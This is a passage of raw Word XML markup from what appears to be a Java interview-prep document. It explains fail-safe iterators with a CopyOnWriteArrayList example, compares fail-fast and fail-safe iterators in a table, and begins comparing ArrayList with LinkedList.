      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These collections create copies of the data during iteration, so even if the collection is modified, the changes do not affect the current iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D6D7D" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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 Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE47E0"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concurrent.CopyOnWriteArrayList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320832C5"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Iterator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F907399" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63AFB216"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FailSafeExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664FD96C"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2054DF80"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pyOnWriteArrayList&lt;String&gt; list = new CopyOnWriteArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730EEE1D"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Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED1CCB7"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Banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A75DD2"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CC73D39"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terator&lt;String&gt; iterator = list.iterator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428477F8"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EFB2AC6"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Modifying the list while iterating (does not throw exception)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A4EB49"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Cherry");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E32503"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60FC798"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This will not throw ConcurrentModificationException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0668F474"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hile (iterator.hasNext()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0376BEA4"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iterator.next());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7C4B67"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465A69B"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AB54945"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7C8C86A" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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utput</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBD5702" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>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pple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BFD307" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="694"/>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anana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F6B38" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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Key Points</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5290F53F" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69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Fail-safe iterators are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and allow modifications to the underlying collection during iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1D4AAE" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69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y work by iterating over a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the collection, so the original collection can be modified without issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C6B20D" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69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Fail-safe iterators do not throw </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ConcurrentModificationException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A98972" w14:textId="77777777" w:rsidR="0002149E"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4EBDDA">
          <v:rect id="_x0000_i1464" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="440AA365" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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Differences Between Fail-Fast and Fail-Safe Iterato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2"/>
        <w:gridCol w:w="4766"/>
        <w:gridCol w:w="3896"/>
      </w:tblGrid>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="68DA54D0" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672B3062" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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7EEBFF82" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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ail-Fast Iterator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EB60B3F" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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ail-Safe Iterator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="6770D829" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AF4A31B"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odification Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3621F9BB"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rows ConcurrentModificationException if the collection is modified during iteration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50765A3E"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oes not throw an exception if the collection is modified during iteration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="4AE9CC6D" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F217C5A"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nderlying Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72AC7244"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irectly iterates over the original collection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CA8985B"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orks on a </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>copy</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> of the collection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="11F1B257" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0654449F"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Safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69D94520"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t thread-safe. Modifications from multiple threads will lead to issues.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F3DD3C3"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read-safe. Modifications can happen safely from other threads.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="5B8F83F5" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00536690"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 Collections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A924335"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rayList, HashSet, HashMap (non-concurrent collections).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78291820"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pyOnWriteArrayList, CopyOnWriteArraySet, ConcurrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="4F75C7CC" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BC6357B"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DFE839A"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ore efficient</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> as it directly modifies the original collection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="580B9591"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ess efficient</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> due to the overhead of copying the collection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="7F45C15E" w14:textId="77777777" w:rsidTr="0002149E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="747EBB11"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 Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CDB72D6"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st used in single-threaded environments or when concurrent modifications are not expected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49D158BA"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st used in multi-threaded environments where concurrent modifications are allowed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32181F45" w14:textId="605FC528" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6274781A" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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293055B6" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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ail-Fast Iterators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are useful for detecting errors early, particularly when concurrent modifications to the collection are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54FFE8" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="695"/>
        </w:numPr>
        <w:jc w:val="both"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Fail-Safe Iterators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are suitable for multi-threaded applications where concurrent modifications are expected, and they allow safe iteration even when the collection is modified during iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58881AA3" w14:textId="1B214B18" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0002149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51B8099">
          <v:rect id="_x0000_i1465" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A55EF" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="0002149E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E52B49D" w14:textId="77777777" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="_Toc196307620"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which is more efficient among the ArrayList and LinkedList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w14:paraId="2A6F3874" w14:textId="265FDE68" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">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oth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are part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Collections Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but they have different internal implementations and performance characteristics. Here's a breakdown of their efficiencies in terms of various operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D57C4E" w14:textId="77777777" w:rsidR="0002149E"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3AFCB0A">
          <v:rect id="_x0000_i1466" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="240E7EB9" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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Internal Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B20567F" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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p>
    <w:p w14:paraId="02A3376F" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69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based</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It uses a dynamically resizing array to store elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A924303" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69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tiguous Memory Allocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Elements are stored in a continuous block of memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6821B1F1" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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List:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB451F3" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69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oubly Linked List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It uses a doubly linked list, where each element (node) contains a reference to both the next and previous elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B8CA97" w14:textId="77777777" w:rsidR="0002149E"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A0D1446">
          <v:rect id="_x0000_i1467" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1340F1AD" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149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Accessing Elements (Random Access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D844633" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1685EFE4" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69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fficient for Random Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Since elements are stored in a contiguous memory block, accessing an element by its index is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constant time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50BDBE" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538BF98A" w14:textId="77777777" w:rsidR="0002149E" w:rsidRPr="00CE4B95" w:rsidRDefault="0002149E" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69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lower for Random Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
